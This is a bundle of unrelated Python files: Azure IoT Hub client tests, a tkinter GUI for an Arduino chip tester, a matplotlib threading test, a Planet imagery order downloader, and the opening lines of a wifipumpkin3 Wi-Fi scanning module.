# 'message' until after a 10 millisecond delay on the insert. But because the
# 'received_message' IS 'message', it means that client.receive_message_on_input
# did not return until after the delay.
@pytest.mark.it(
"Returns None after a timeout while blocking, in blocking mode with a specified timeout"
)
def test_times_out_waiting_for_message_blocking_mode(self, client):
input_name = "some_input"
result = client.receive_message_on_input(input_name, block=True, timeout=0.01)
assert result is None
@pytest.mark.it("Returns None immediately if there are no messages, in nonblocking mode")
def test_no_message_in_inbox_nonblocking_mode(self, client):
input_name = "some_input"
result = client.receive_message_on_input(input_name, block=False)
assert result is None
@pytest.mark.it("Locks the client to API Receive Mode if the receive mode has not yet been set")
@pytest.mark.parametrize(
"block,timeout",
[
pytest.param(True, None, id="Blocking, no timeout"),
pytest.param(True, 10, id="Blocking with timeout"),
pytest.param(False, None, id="Nonblocking"),
],
)
def test_receive_mode_not_set(self, mocker, client, block, timeout):
inbox_mock = mocker.MagicMock(autospec=SyncClientInbox)
mocker.patch.object(
client._inbox_manager, "get_input_message_inbox", return_value=inbox_mock
)
assert client._receive_type is RECEIVE_TYPE_NONE_SET
client.receive_message_on_input(input_name="some_input", block=block, timeout=timeout)
assert client._receive_type is RECEIVE_TYPE_API
@pytest.mark.it(
"Does not modify the client receive mode if it has already been set to API Receive Mode"
)
@pytest.mark.parametrize(
"block,timeout",
[
pytest.param(True, None, id="Blocking, no timeout"),
pytest.param(True, 10, id="Blocking with timeout"),
pytest.param(False, None, id="Nonblocking"),
],
)
def test_receive_mode_set_api(self, mocker, client, block, timeout):
inbox_mock = mocker.MagicMock(autospec=SyncClientInbox)
mocker.patch.object(
client._inbox_manager, "get_input_message_inbox", return_value=inbox_mock
)
client._receive_type = RECEIVE_TYPE_API
client.receive_message_on_input(input_name="some_input", block=block, timeout=timeout)
assert client._receive_type is RECEIVE_TYPE_API
@pytest.mark.it(
"Raises a ClientError and does nothing else if the client receive mode has been set to Handler Receive Mode"
)
@pytest.mark.parametrize(
"block,timeout",
[
pytest.param(True, None, id="Blocking, no timeout"),
pytest.param(True, 10, id="Blocking with timeout"),
pytest.param(False, None, id="Nonblocking"),
],
)
def test_receive_mode_set_handler(self, mocker, client, mqtt_pipeline, block, timeout):
inbox_mock = mocker.MagicMock(autospec=SyncClientInbox)
mocker.patch.object(
client._inbox_manager, "get_input_message_inbox", return_value=inbox_mock
)
# patch this so we can make sure feature enabled isn't modified
mqtt_pipeline.feature_enabled.__getitem__.return_value = False
client._receive_type = RECEIVE_TYPE_HANDLER
# Error was raised
with pytest.raises(client_exceptions.ClientError):
client.receive_message_on_input(input_name="some_input", block=block, timeout=timeout)
# Feature was not enabled
assert mqtt_pipeline.enable_feature.call_count == 0
# Inbox get was not called
assert inbox_mock.get.call_count == 0
@pytest.mark.describe("IoTHubModuleClient (Synchronous) - .receive_method_request()")
class TestIoTHubModuleClientReceiveMethodRequest(
IoTHubModuleClientTestsConfig, SharedClientReceiveMethodRequestTests
):
pass
@pytest.mark.describe("IoTHubModuleClient (Synchronous) - .send_method_response()")
class TestIoTHubModuleClientSendMethodResponse(
IoTHubModuleClientTestsConfig, SharedClientSendMethodResponseTests
):
pass
@pytest.mark.describe("IoTHubModuleClient (Synchronous) - .get_twin()")
class TestIoTHubModuleClientGetTwin(IoTHubModuleClientTestsConfig, SharedClientGetTwinTests):
pass
@pytest.mark.describe("IoTHubModuleClient (Synchronous) - .patch_twin_reported_properties()")
class TestIoTHubModuleClientPatchTwinReportedProperties(
IoTHubModuleClientTestsConfig, SharedClientPatchTwinReportedPropertiesTests
):
pass
@pytest.mark.describe("IoTHubModuleClient (Synchronous) - .receive_twin_desired_properties_patch()")
class TestIoTHubModuleClientReceiveTwinDesiredPropertiesPatch(
IoTHubModuleClientTestsConfig, SharedClientReceiveTwinDesiredPropertiesPatchTests
):
pass
@pytest.mark.describe("IoTHubModuleClient (Synchronous) - .invoke_method()")
class TestIoTHubModuleClientInvokeMethod(WaitsForEventCompletion, IoTHubModuleClientTestsConfig):
@pytest.mark.it("Begins a 'invoke_method' HTTPPipeline operation where the target is a device")
def test_calls_pipeline_invoke_method_for_device(self, client, http_pipeline):
method_params = {"methodName": "__fake_method_name__"}
device_id = "__fake_device_id__"
client.invoke_method(method_params, device_id)
assert http_pipeline.invoke_method.call_count == 1
assert http_pipeline.invoke_method.call_args[0][0] is device_id
assert http_pipeline.invoke_method.call_args[0][1] is method_params
@pytest.mark.it("Begins a 'invoke_method' HTTPPipeline operation where the target is a module")
def test_calls_pipeline_invoke_method_for_module(self, client, http_pipeline):
method_params = {"methodName": "__fake_method_name__"}
device_id = "__fake_device_id__"
module_id = "__fake_module_id__"
client.invoke_method(method_params, device_id, module_id=module_id)
assert http_pipeline.invoke_method.call_count == 1
assert http_pipeline.invoke_method.call_args[0][0] is device_id
assert http_pipeline.invoke_method.call_args[0][1] is method_params
assert http_pipeline.invoke_method.call_args[1]["module_id"] is module_id
@pytest.mark.it(
"Waits for the completion of the 'invoke_method' pipeline operation before returning"
)
def test_waits_for_pipeline_op_completion(
self, mocker, client_manual_cb, http_pipeline_manual_cb
):
method_params = {"methodName": "__fake_method_name__"}
device_id = "__fake_device_id__"
module_id = "__fake_module_id__"
self.add_event_completion_checks(
mocker=mocker,
pipeline_function=http_pipeline_manual_cb.invoke_method,
kwargs={"invoke_method_response": "__fake_invoke_method_response__"},
)
client_manual_cb.invoke_method(method_params, device_id, module_id=module_id)
@pytest.mark.it(
"Raises a client error if the `invoke_method` pipeline operation calls back with a pipeline error"
)
@pytest.mark.parametrize(
"pipeline_error,client_error",
[
pytest.param(
pipeline_exceptions.ProtocolClientError,
client_exceptions.ClientError,
id="ProtocolClientError->ClientError",
),
pytest.param(Exception, client_exceptions.ClientError, id="Exception->ClientError"),
],
)
def test_raises_error_on_pipeline_op_error(
self, mocker, client_manual_cb, http_pipeline_manual_cb, pipeline_error, client_error
):
method_params = {"methodName": "__fake_method_name__"}
device_id = "__fake_device_id__"
module_id = "__fake_module_id__"
my_pipeline_error = pipeline_error()
self.add_event_completion_checks(
mocker=mocker,
pipeline_function=http_pipeline_manual_cb.invoke_method,
kwargs={"error": my_pipeline_error},
)
with pytest.raises(client_error) as e_info:
client_manual_cb.invoke_method(method_params, device_id, module_id=module_id)
assert e_info.value.__cause__ is my_pipeline_error
@pytest.mark.describe("IoTHubModuleClient (Synchronous) - PROPERTY .on_message_received")
class TestIoTHubModuleClientPROPERTYOnMessageReceivedHandler(
IoTHubModuleClientTestsConfig, SharedIoTHubClientPROPERTYHandlerTests
):
@pytest.fixture
def handler_name(self):
return "on_message_received"
@pytest.fixture
def feature_name(self):
return pipeline_constant.INPUT_MSG
@pytest.mark.describe("IoTHubModuleClient (Synchronous) - PROPERTY .on_method_request_received")
class TestIoTHubModuleClientPROPERTYOnMethodRequestReceivedHandler(
IoTHubModuleClientTestsConfig, SharedIoTHubClientPROPERTYHandlerTests
):
@pytest.fixture
def handler_name(self):
return "on_method_request_received"
@pytest.fixture
def feature_name(self):
return pipeline_constant.METHODS
@pytest.mark.describe(
"IoTHubModuleClient (Synchronous) - PROPERTY .on_twin_desired_properties_patch_received"
)
class TestIoTHubModuleClientPROPERTYOnTwinDesiredPropertiesPatchReceivedHandler(
IoTHubModuleClientTestsConfig, SharedIoTHubClientPROPERTYHandlerTests
):
@pytest.fixture
def handler_name(self):
return "on_twin_desired_properties_patch_received"
@pytest.fixture
def feature_name(self):
return pipeline_constant.TWIN_PATCHES
@pytest.mark.describe("IoTHubModule (Synchronous) - PROPERTY .connected")
class TestIoTHubModuleClientPROPERTYConnected(
IoTHubModuleClientTestsConfig, SharedIoTHubClientPROPERTYConnectedTests
):
pass
@pytest.mark.describe("IoTHubModuleClient (Synchronous) - OCCURANCE: Connect")
class TestIoTHubModuleClientOCCURANCEConnect(
IoTHubModuleClientTestsConfig, SharedIoTHubClientOCCURANCEConnectTests
):
pass
@pytest.mark.describe("IoTHubModuleClient (Synchronous) - OCCURANCE: Disconnect")
class TestIoTHubModuleClientOCCURANCEDisconnect(
IoTHubModuleClientTestsConfig, SharedIoTHubClientOCCURANCEDisconnectTests
):
pass
|
gui.py
|
import tkinter as tk
from tkinter import *
import tkinter.ttk as ttk
from tkinter.ttk import *
from tkinter.messagebox import showerror
import serial
import threading
import time
import queue
import os
if os.name == 'nt': # sys.platform == 'win32':
from serial.tools.list_ports_windows import comports
elif os.name == 'posix':
from serial.tools.list_ports_posix import comports
# ~ elif os.name == 'java':
else:
raise ImportError("Sorry: no implementation for your platform ('{}') available".format(os.name))
def quit(event):
print("Double Click, so let's stop")
import sys
sys.exit()
class TextScrollCombo(ttk.Frame):
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
# ensure a consistent GUI size
# implement stretchability
self.grid_rowconfigure(0, weight=1)
self.grid_columnconfigure(0, weight=1)
# create a Text widget
self.txt = tk.Text(self)
self.txt.grid(row=0, column=0, sticky="nsew", padx=2, pady=2)
# create a Scrollbar and associate it with txt
scrollb = ttk.Scrollbar(self, command=self.txt.yview)
scrollb.grid(row=0, column=1, sticky='nsew')
self.txt['yscrollcommand'] = scrollb.set
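# Used in initUI as the right-hand serial log pane.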
class CreateToolTip(object):
'''
create a tooltip for a given widget
'''
def __init__(self, widget, text='widget info'):
self.widget = widget
self.text = text
self.widget.bind("<Enter>", self.enter)
self.widget.bind("<Leave>", self.close)
def enter(self, event=None):
x = y = 0
x, y, cx, cy = self.widget.bbox("insert")
x += self.widget.winfo_rootx() + 25
y += self.widget.winfo_rooty() + 20
# creates a toplevel window
self.tw = tk.Toplevel(self.widget)
# Leaves only the label and removes the app window
self.tw.wm_overrideredirect(True)
self.tw.wm_geometry("+%d+%d" % (x, y))
label = tk.Label(self.tw, text=self.text, justify='left',
background='yellow', relief='solid', borderwidth=1,
font=("courier", "9", "normal"))
label.pack(ipadx=1)
def close(self, event=None):
if self.tw:
self.tw.destroy()
class Zif(Frame):
USE_v1_HACK = True
socketWidth = 200
pins = 24
rows = pins // 2
pitchVert = 40
marginSide = 20
marginTop = 100
marginBot = 50
labelSize = 30
pinHeight = 25
pinWidth = 50
height = marginTop + marginBot + (pitchVert * (rows - 1))
width = socketWidth + 50
selectorSize = 100 # width fine tuned to only show first letter of selection when collapsed
selectorHeight = 25
patternWidth = socketWidth
patternHeight = 30
testButtonSize = 30
zifPosX = 150
zifPosY = 80
if USE_v1_HACK:
pinCountOptions = [2, 4, 6, 8, 10, 12, 14, 16, 18, 20, 22]
else:
pinCountOptions = [2, 4, 6, 8, 10, 12, 14, 16, 18, 20, 22, 24]
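# With the v1 hardware hack, ZIF pins 1 and 24 are left unconnected (see optionMenu and pinCountSelector), so the 24-pin option is omitted.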
surfaceCol = "#EEE"
def __init__(self, parent, *args, **kwargs):
self.pinNumLabels = {}
self.pinLabels = {}
self.pinControls = {}
self.pinCodes = {}
self.testPattern = StringVar()
self.autoTest = BooleanVar()
self.autoTest.set(True)
self.portSelectorWidget = None
self.ports = []
self.lastPorts = []
self.portSelectorPrompt = "choose port"
self.rebuildPortSelector = None
self.comPortVar = StringVar()
self.arduinoInputQueue = queue.Queue()
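# Commands for the Arduino (e.g. the "t:" test pattern from runTest) are queued here for the serial worker thread started in startResponseThread.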
tk.Frame.__init__(self, parent)
self.initUI()
self.startResponseThread()
def initUI(self):
spaceUnderZif = self.zifPosY + 50
self.config(height=Zif.height + spaceUnderZif, width=Zif.width * 2, background="white", borderwidth=0,
highlightthickness=0)
canvasTop = Canvas(self, height=Zif.height + spaceUnderZif, width=Zif.width * 2, background="white",
borderwidth=1,
highlightthickness=0)
canvasTop.pack(side=LEFT, padx=10, pady=20)
canvasTop.create_rectangle(Zif.zifPosX + 2, Zif.zifPosY + 55, Zif.zifPosX + Zif.socketWidth,
Zif.zifPosY + Zif.height, width=1, outline="black", fill=Zif.surfaceCol)
canvasTop.create_rectangle(Zif.zifPosX + 20, Zif.zifPosY + 20, Zif.zifPosX + 40, Zif.zifPosY + 80, width=1,
outline="black", fill="#F7F7F7");
canvasTop.create_rectangle(Zif.zifPosX + 18, Zif.zifPosY + 5, Zif.zifPosX + 42, Zif.zifPosY + 30, width=1,
outline="black", fill="#EEE");
self.portSelector(canvasTop)
self.pinCountSelector(canvasTop)
self.patternField(canvasTop)
self.testButton(canvasTop)
self.autoCheckbox(canvasTop)
self.macros(canvasTop)
for pin in range(0, self.pins):
self.pinNumLabel(canvasTop, x=self.labelPosH(pin), y=self.pinPosV(pin), text=str(pin + 1),
width=Zif.labelSize, height=Zif.labelSize, pin=pin)
self.pin(canvasTop, x=self.pinPosH(pin), y=self.pinPosV(pin),
width=Zif.pinWidth, height=Zif.pinHeight, pin=pin)
# render as buttons or drop down?
buttons=False
if buttons:
self.optionButtons(canvasTop, x=self.selectorPosH(pin), y=self.pinPosV(pin), pin=pin)
else:
self.optionMenu(canvasTop, x=self.selectorPosH(pin), y=self.pinPosV(pin), pin=pin)
# right hand log pane
self.comms = TextScrollCombo(self, height=30, width=40)
self.comms.txt.insert(tk.END, "Serial Log File:\n")
self.comms.pack(fill=BOTH, expand=1)
#
canvasTop.pack(anchor="nw")
self.pack(fill=BOTH, expand=1)
self.repaintPattern()
def startResponseThread(self):
# thread to read and print data from arduino
sinput_thread = threading.Thread(target=self.serialLoop)
sinput_thread.daemon = True
sinput_thread.start()
def writeLog(self, txt):
self.comms.txt.insert(tk.END, txt)
self.comms.txt.see("end")
def rowOfPin(self, pin):
if pin < (self.pins / 2):
return pin
else:
return self.pins - pin - 1
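# DIP-style numbering: the first half of the pins runs down one side of the socket and the second half runs back up the other, so opposite pins map to the same row.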
def pinPosV(self, pin):
return self.zifPosY + Zif.marginTop + (self.pitchVert * self.rowOfPin(pin))
def pinPosH(self, pin):
if pin < (self.pins / 2):
return Zif.zifPosX + Zif.marginSide
else:
return Zif.zifPosX + Zif.socketWidth - Zif.marginSide - Zif.pinWidth
def labelPosH(self, pin):
gap = 1
if pin < (self.pins / 2):
return Zif.zifPosX + Zif.marginSide + Zif.pinWidth + gap
else:
return Zif.zifPosX + Zif.socketWidth - Zif.marginSide - Zif.labelSize - Zif.pinWidth - gap
def selectorPosH(self, pin):
gap = 20
if pin < (self.pins / 2):
return Zif.zifPosX - Zif.selectorSize - gap
else:
return Zif.zifPosX + Zif.socketWidth + gap
def macros(self, master):
def macro(text, xoffset, y, code, fn=self.runTest):
def onClick():
if code:
for pin in sorted(self.pinCodes.keys()):
self.pinCodes[pin].set(code)
self.repaintPattern()
fn()
width = 60
xpos = Zif.zifPosX + self.socketWidth + 20 + (xoffset * width + xoffset * 5)
f = Frame(master, height=20, width=width)
f.pack_propagate(0) # don't shrink
f.pack()
f.place(x=xpos, y=y)
b = tk.Button(f, text=text, bg="bisque2", command=onClick)
b.pack(fill=BOTH, expand=1)
ypos = 0
macro("All 1", 0, ypos + 0, "1")
ypos = ypos + 21
macro("All 0", 0, ypos, "0")
ypos = ypos + 21
macro("All H", 0, ypos, "H")
ypos = ypos + 21
macro("All L", 0, ypos, "L")
ypos = 0
macro("All Z", 1, ypos, "Z")
ypos = ypos + 21
macro("All S", 1, ypos, "S")
ypos = ypos + 21
macro("All ?", 1, ypos, "?")
ypos = ypos + 21
macro("Identify", 1, ypos, None, fn=self.runIdentify)
def testButton(self, master):
def onClick():
self.runTest()
width = 60
xpos = Zif.zifPosX + 80
f = Frame(master, height=30, width=width)
f.pack_propagate(0) # don't shrink
f.pack()
f.place(x=xpos, y=2)
b = tk.Button(f, text="Test", bg="bisque2", command=onClick)
b.pack(fill=BOTH, expand=1)
def autoCheckbox(self, master):
xpos = Zif.zifPosX + 150
cb = tk.Checkbutton(master, text="Auto", height=1, width=3, bg="white", variable=self.autoTest)
cb.place(x=xpos, y=4)
def optionButtons(self, parent, x, y, pin):
def click():
self.repaintPattern()
if self.autoTest.get():
self.runTest()
f = Frame(parent)
f.pack_propagate(0) # don't shrink
f.pack()
f.place(x=x, y=y)
v = tk.StringVar()
v.set("?")
self.pinCodes[pin] = v
buttons = [
("1 input", "red3"),
("Vcc", "red3"),
("Clock input", "brown"),
(None, "white"),
("High output expected", "red3"),
("Z output expected", "black"),
(None, "white"),
("? active test", "blue"),
("0 input", "green"),
("GND", "green"),
("-", "white"),
(None, "white"),
("Low output expected", "green"),
("X don't care", "black"),
(None, "white"),
("S sample passive voltage", "blue"),
]
p = 0
for text, fg in buttons:
t = int(len(buttons) / 2)
row = int(p / t)
col = p % t
width = 16
if text is None:
width = 3
# mini frame needed to fix size of control
fb = Frame(f, height=18, width=width)
fb.pack_propagate(0) # don't shrink
fb.grid(row=row, column=col)
if text is not None and text != "-":
c = text[0]
b = tk.Radiobutton(fb, text=c, variable=v, value=c, indicatoron=0, anchor="c",
font=("courier", 8), command=click, fg=fg, bg="white", selectcolor="yellow", borderwidth=1)
CreateToolTip(b, text)
else:
b = tk.Label(fb, text="", bg="white")
b.pack(fill=BOTH, expand=1)
p = p + 1
def optionMenu(self, master, x, y, pin):
options = ["0 in", "1 in", "V in", "G in", "C in", "L expected", "H expected", "Z expected",
"X don't care",
"? test", "S sample"]
defaultOption = 9
width = Zif.selectorSize
height = Zif.selectorHeight
f = Frame(master, height=height, width=width)
f.pack_propagate(0) # don't shrink
f.pack()
f.place(x=x, y=y)
if self.USE_v1_HACK and (pin == 0 or pin == 23):
o = Label(f, text="-", font=("courier", 9), background=Zif.surfaceCol, borderwidth=0, anchor="center")
o.pack(fill=BOTH, expand=1)
else:
def onClick(code):
self.repaintPattern()
if self.autoTest.get():
self.runTest()
variable = StringVar()
b = OptionMenu(f, variable, options[defaultOption], command=onClick, *options)
b["menu"].config(bg="white", font=("courier", 9), activebackground="cornflower blue", selectcolor="green")
b.pack(fill=BOTH, expand=1)
self.pinCodes[pin] = variable
def pinNumLabel(self, master, x, y, text, height, width, pin):
f = Frame(master, height=height, width=width)
f.pack_propagate(0) # don't shrink
f.pack()
f.place(x=x, y=y)
o = Label(f, text=text, font=("courier", 9), background=Zif.surfaceCol, borderwidth=0, anchor="center")
o.pack(fill=BOTH, expand=1)
self.pinNumLabels[pin] = o
def pin(self, master, x, y, height, width, pin):
f = Frame(master, height=height, width=width)
f.pack_propagate(0) # don't shrink
f.pack()
f.place(x=x, y=y)
pinLabelVariable = StringVar()
pinLabelVariable.set("")
o = Label(f, textvariable=pinLabelVariable, font=("courier", 9), background="#DDD", borderwidth=2,
relief="solid", anchor="center")
o.pack(fill=BOTH, expand=1)
self.pinLabels[pin] = pinLabelVariable
self.pinControls[pin] = o
def patternField(self, master):
f = Frame(master, width=self.patternWidth, height=Zif.patternHeight)
f.pack_propagate(0) # don't shrink
f.pack()
f.place(x=Zif.zifPosX, y=self.zifPosY + Zif.height + 20)
o = Entry(f, font=("courier", 9),
textvariable=self.testPattern, width=self.patternWidth,
justify=CENTER)
o.pack(fill=BOTH, expand=1)
def getPorts(self):
iterator = sorted(comports(include_links=False))
ports = []
for n, (port, desc, hwid) in enumerate(iterator, 1):
ports.append(port)
return ports
def portSelector(self, master):
gap = 30
f = Frame(master, width=Zif.socketWidth - (2 * gap), height=Zif.patternHeight)
f.pack_propagate(0) # don't shrink
f.pack()
f.place(x=10, y=2)
self.lastPorts = []
def repopulate():
ports = self.getPorts()
if ports != self.lastPorts:
self.portSelectorWidget.pack_forget()
self.portSelectorWidget = build()
self.lastPorts = ports
def build():
self.ports = self.getPorts()
b = OptionMenu(f, self.comPortVar, self.portSelectorPrompt, *self.ports)
b["menu"].config(bg="white", font=("courier", 9), activebackground="cornflower blue", selectcolor="green")
b.pack(fill=BOTH, expand=1)
return b
self.portSelectorWidget = build()
self.rebuildPortSelector = repopulate
def pinCountSelector(self, master):
def onClick(count):
validRows = count / 2
pcount = 0
for ipin in range(0, self.pins):
row = self.rowOfPin(ipin)
if self.USE_v1_HACK and (ipin == 0 or ipin == 23):
label = "-"
elif row <= validRows:
pcount = pcount + 1
label = str(pcount)
else:
label = "-"
self.pinNumLabels[ipin]["text"] = label
gap = 30
f = Frame(master, width=Zif.socketWidth - (2 * gap), height=Zif.patternHeight)
f.pack_propagate(0) # don't shrink
f.pack()
f.place(x=10, y=40)
ignored = IntVar()
self.ports = self.getPorts()
b = OptionMenu(f, ignored, "pin count", command=onClick, *self.pinCountOptions)
b["menu"].config(bg="white", font=("courier", 9), activebackground="cornflower blue", selectcolor="green")
b.pack(fill=BOTH, expand=1)
def repaintPattern(self):
pattern = ""
for pin in sorted(self.pinCodes.keys()):
code = self.pinCodes[pin].get()[0]
pattern = pattern + code
half = int(len(pattern) / 2)
split1 = pattern[0:half]
split2 = pattern[half: len(pattern)]
cut = split1 + "/" + split2
self.testPattern.set(cut)
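# Illustrative example (hypothetical 8-pin device, not the tool's real pin count): if the
# per-pin codes are 1,0,C,G,V,L,H,Z the pattern field shows "10CG/VLHZ", and runTest()
# below sends it to the tester as "t:10CG/VLHZ".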
def runTest(self):
port = self.comPortVar.get()
if port == "":
self.writeLog("Port not open yet\n")
return
pat = "t:" + self.testPattern.get()
self.arduinoInputQueue.put(pat)
def runIdentify(self):
port = self.comPortVar.get()
if port == "":
self.writeLog("Port not open yet\n")
return
self.arduinoInputQueue.put("i")
def paintResult(self, result):
self.writeLog("%s" % result)
if result.startswith("ERROR"):
showerror(title="Error Response", message=result)
elif result.startswith("RESULT"):
resp = result.replace("RESULT : ", "").strip()
for ipin in range(0, self.pins):
fg = "black"
code = resp[ipin]
incode = "-"
if ipin in self.pinCodes:
incode = self.pinCodes[ipin].get()[0]
if code == "-":
# not a pin
self.pinControls[ipin].configure(background="gray95", foreground=fg)
elif code == "_":
# was an input
code = incode
color = "white"
if code == "V": # was an assertion to not ok
fg = "red"
elif code == "G":
fg = "green"
elif code == "C":
fg = "blue"
elif code == "1":
fg = "red"
elif code == "0":
fg = "green"
self.pinControls[ipin].configure(background=color, foreground=fg)
elif code == ".":
# was ok
code = incode
self.pinControls[ipin].configure(background="pale green", foreground=fg)
else:
# might be ok cos this could be a "S" or "?"
color = "yellow"
if incode in "HLZ": # was an assertion to not ok
color = "red"
self.pinControls[ipin].configure(background=color, foreground=fg)
self.pinLabels[ipin].set(code)
def serialLoop(self):
serialPort = None
current = self.comPortVar.get()
if self.portSelectorPrompt == current:
self.writeLog("Port not open yet\n")
while True:
self.rebuildPortSelector()
try:
port = self.comPortVar.get()
if self.portSelectorPrompt == port:
time.sleep(0.1)
continue
if port != current:
current = port
if serialPort:
serialPort.close()
serialPort = None
else:
if serialPort is None:
self.writeLog("Connecting: %s\n" % port)
serialPort = serial.Serial(port, baudrate=57600, timeout=0.05)
# give arduino a chance to respond
time.sleep(0.1)
# reset queue
while not self.arduinoInputQueue.empty():
self.arduinoInputQueue.get()
l = serialPort.readline()
while len(l) > 0:
line = l.decode("utf-8")
self.paintResult(line)
l = serialPort.readline()
# only send one line at a time then process all responses
if not self.arduinoInputQueue.empty():
w = self.arduinoInputQueue.get()
self.writeLog(w.strip() + "\n")
serialPort.write(w.encode("utf-8"))
serialPort.write("\n".encode("utf-8"))
# wait for some response
while serialPort.in_waiting == 0:
time.sleep(0.05)
except BaseException as e:
if serialPort is not None:
self.writeLog("Disconnecting: %s\n" % str(e))
serialPort.close()
serialPort = None
else:
self.writeLog("No Connection: %s\n" % str(e))
time.sleep(2)
def main():
root = Tk()
root.title("Exploratory Tool")
ex = Zif(root)
ex.pack()
# root.geometry("600x450+150+150")
root.mainloop()
if __name__ == '__main__':
main()
|
threading_test.py
|
#! /usr/bin/python
"""
Test by Karen Tracey for threading problem reported in
http://www.mail-archive.com/matplotlib-devel@lists.sourceforge.net/msg04819.html
and solved by JDH in git commit 175e3ec5bed9144.
"""
from __future__ import print_function
import os
import threading
import traceback
import numpy as np
from matplotlib.backends.backend_agg import FigureCanvasAgg as FigureCanvas
from matplotlib.figure import Figure
thread_count = 8
max_iterations = 50
exception_raised = False
def png_thread(tn):
png_fname = 'out%d.png' % tn
vals = 100 + 15 * np.random.randn(10000)
i = 0
excp = None
global exception_raised
while not exception_raised and i < max_iterations:
i += 1
png_f = open(png_fname, 'wb')
try:
fig = Figure()
ax = fig.add_subplot(111)
ax.hist(vals, 50)
FigureCanvas(fig).print_png(png_f)
except Exception:
excp = traceback.format_exc()
png_f.close()
if excp:
print('png_thread %d failed on iteration %d:' % (tn, i))
print(excp)
exception_raised = True
else:
print('png_thread %d completed iteration %d.' % (tn, i))
os.unlink(png_fname)
def main(tc):
threads = []
for i in range(tc):
threads.append(threading.Thread(target=png_thread, args=(i + 1,)))
for t in threads:
t.start()
for t in threads:
t.join()
if not exception_raised:
msg = 'Success! %d threads completed %d iterations with no exceptions raised.'
else:
msg = 'Failed! Exception raised before %d threads completed %d iterations.'
print(msg % (tc, max_iterations))
if __name__ == "__main__":
main(thread_count)
|
multiproc_pydl.py
|
__copyright__ = """
Copyright 2019 Samapriya Roy
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
__license__ = "Apache 2.0"
#!/usr/bin/env python
import multiprocessing
import os
import csv
import requests
import time
import progressbar
import json
import sys
from retrying import retry
from planet.api.utils import read_planet_json
from planet.api.auth import find_api_key
#Get Planet API and Authenticate SESSION
try:
PL_API_KEY = find_api_key()
except:
print('Failed to get Planet Key')
sys.exit()
SESSION = requests.Session()
SESSION.auth = (PL_API_KEY, '')
# To get redirect link
@retry(
wait_exponential_multiplier=1000,
wait_exponential_max=10000)
def check_for_redirects(url):
try:
r = SESSION.get(url, allow_redirects=False, timeout=0.5)
if r.status_code == 429:
raise Exception("rate limit error")
if 300 <= r.status_code < 400:
return r.headers['location']
else:
return 'no redirect'
except requests.exceptions.Timeout:
return '[timeout]'
except requests.exceptions.ConnectionError:
return '[connection error]'
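# Illustrative usage sketch (the order URL is a hypothetical placeholder, not from this script):
#   location = check_for_redirects("https://api.planet.com/compute/ops/orders/v2/<order-id>/results/0")
#   if location.startswith('https'):
#       ...download from the redirected location...
# Non-redirect cases return 'no redirect', '[timeout]' or '[connection error]'.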
########################################################################
class MultiProcDownloader(object):
"""
Downloads urls with Python's multiprocessing module
"""
#----------------------------------------------------------------------
def __init__(self, urls):
""" Initialize class with list of urls """
self.urls = urls
#----------------------------------------------------------------------
def run(self):
"""
Download the urls and wait for the processes to finish
"""
jobs = []
for url in self.urls:
process = multiprocessing.Process(target=self.worker, args=(url,))
jobs.append(process)
process.start()
for job in jobs:
job.join()
#----------------------------------------------------------------------
def worker(self, url):
"""
The target method that the process uses to download the specified url
"""
try:
urlcheck=url.split('|')[0]
fullpath=url.split('|')[1]
[head,tail]=os.path.split(fullpath)
msg = "Starting download of %s" % fullpath.split('/')[-1]
if not os.path.exists(head):
os.makedirs(head)
os.chdir(head)
if not os.path.isfile(fullpath):
print(msg, multiprocessing.current_process().name)
r = requests.get(urlcheck)
with open(fullpath, "wb") as f:
f.write(r.content)
else:
print("File already exists skipping "+str(tail))
except Exception as e:
print(e)
print('Issues with file: '+str(fullpath))
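# Note (derived from funct() below): each entry handed to MultiProcDownloader is a
# pipe-delimited "<download-url>|<local-destination-path>" string, e.g. (hypothetical values)
#   urls = ["https://example.com/scene.zip|/tmp/planet_demo/scene.zip"]
#   MultiProcDownloader(urls).run()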
def funct(url,final,ext):
if not os.path.exists(final):
os.makedirs(final)
final = os.path.abspath(final)
urls=[]
response=SESSION.get(url).json()
print("Polling with exponential backoff..")
while response['state']=='running' or response['state']=='starting':
bar = progressbar.ProgressBar()
for z in bar(range(60)):
time.sleep(1)
response=SESSION.get(url).json()
if response['state']=='success':
for items in response['_links']['results']:
url=(items['location'])
url_to_check = url if url.startswith('https') else "http://%s" % url
redirect_url = check_for_redirects(url_to_check)
if redirect_url.startswith('https'):
local_path=os.path.join(final,str(os.path.split(items['name'])[-1]))
if ext is None:
urls.append(str(redirect_url)+'|'+local_path)
elif ext is not None:
if local_path.endswith(ext):
urls.append(str(redirect_url)+'|'+local_path)
else:
print('Order Failed with state: '+str(response['state']))
downloader = MultiProcDownloader(urls)
downloader.run()
#----------------------------------------------------------------------
if __name__ == "__main__":
funct(url=sys.argv[1],final=os.path.normpath(sys.argv[2]),ext=sys.argv[3])
# funct(url='https://api.planet.com/compute/ops/orders/v2/4ebfa89e-dc59-41cc-ad82-dbad2b5375b2',final=r'C:\planet_demo',ext='.zip')
# downloader = MultiProcDownloader(urls)
# downloader.run()
|
wifiscan.py
|
from wifipumpkin3.core.common.terminal import ModuleUI
from wifipumpkin3.core.config.globalimport import *
from wifipumpkin3.core.utility.printer import (
display_messages,
setcolor,
display_tabulate,
)
from random import randrange
import time, signal, sys
from multiprocessing import Process
from scapy.all import *
from wifipumpkin3.core.common.platforms import Linux
from tabulate import tabulate
# This file is part of the wifipumpkin3 Open Source Project.
# wifipumpkin3 is licensed under the Apache 2.0.
# Copyright 2020 P0cL4bs Team - Marcos Bomfim (mh4x0f)
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
PROBE_REQUEST_TYPE = 0
PROBE_REQUEST_SUBTYPE = 4
DOT11_REQUEST_SUBTYPE = 2
class ModPump(ModuleUI):
""" Scan WiFi networks and detect devices"""
name = "wifiscan"
options = {
"interface": ["wlxc83a35cef744", "Name network interface wireless "],
